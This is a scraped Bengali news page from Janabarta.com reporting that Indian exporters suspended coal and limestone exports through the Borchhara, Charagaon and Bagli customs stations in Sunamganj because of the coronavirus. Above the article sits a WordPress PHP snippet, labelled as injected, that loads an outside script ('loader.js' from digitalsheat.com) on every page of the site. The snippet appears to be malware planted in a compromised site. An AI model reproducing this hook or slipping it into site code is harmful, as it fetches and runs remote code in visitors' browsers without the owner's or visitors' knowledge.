// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site বড়ছড়াসহ তিন শুল্ক ষ্টেশনে ভারতীয় কয়লা চুনাপাথর রফতানি স্থগিত - Janabarta.com

বড়ছড়াসহ তিন শুল্ক ষ্টেশনে ভারতীয় কয়লা চুনাপাথর রফতানি স্থগিত

রাহাদ হাসান মুন্না (সুনামগঞ্জ): সারাবিশ্বে করোনা ভাইরাস মহামারীতে পরিণত হওয়ায় এবার ভারতের মেঘালয় রাজ্য হতে সুনামগঞ্জের তিন শুল্ক ষ্টেশন দিয়ে কয়লা চুনাপাথর রফতানি কার্যক্রম আপাতত স্থগিত করা হয়েছে।

ভারতের মেঘালয়  রাজ্যে থাকা কয়লা চুনাপাথর রফতানী কারক সংগঠন বাগলী এক্সপোটার্স এ্যাসোসিয়েশন এমন সিদ্ধান্ত নিয়েছেন।

তাহিরপুরের বড়ছড়া শুল্ক ষ্টেশনের রাজস্ব কর্মকর্তাকে ওই বিষয়টি জানিয়ে ভারতীয় এক্সপোটার্স এ্যাসোসিয়েশনের পক্ষ হতে এক  জরুরী ই-মেইলে প্রেরণের মাধ্যমে রফতানী কার্যক্রম আপাতত স্থগিতের বিষয়টি জানিয়ে দেয়া হয়েছে।

সুনামগঞ্জের তাহিরপুরের বড়ছড়া শুল্ক ষ্টেশনের রাজস্ব কর্মকর্তা মো.রেজাউল করিম জানান, ভারতের মেঘালয় রাজ্যের বাগলী এক্সপোটার্স (রফতানিকারক) এ্যাসোসিয়েশন সাউথ ওয়েষ্ট খাসি হিল্স নেতৃবৃন্ধ রবিবার সকালে প্রেরিত এক জরুরী ই-মেইলে করোনা ভাইরাসের প্রভাবের কারন দেখিয়ে তাহিরপুরের বড়ছড়া, চারাগাঁও, বাগলী এ তিন শুল্ক ষ্টেশন দিয়ে কয়লা-চুনাপাথর রফতানি কার্যক্রম আপাতত স্থগিত রাখার বিষয়টি আমাদেরকে অবহিত করেছেন।

তিনি আরো বলেন, করোনা ভাইরাস মোকাবেলায় ঝুঁকি এড়াতে চলতি বছরের ২৩ হতে ৩১ মার্চ টানা ৯দিন ওই তিন শুল্ক ষ্টেশন দিয়ে ভারতীয় রফতানীকারকগণ আপাতত কয়লা ও চুনাপাথর রফতানি কার্যক্রম স্থগিত করেছেন।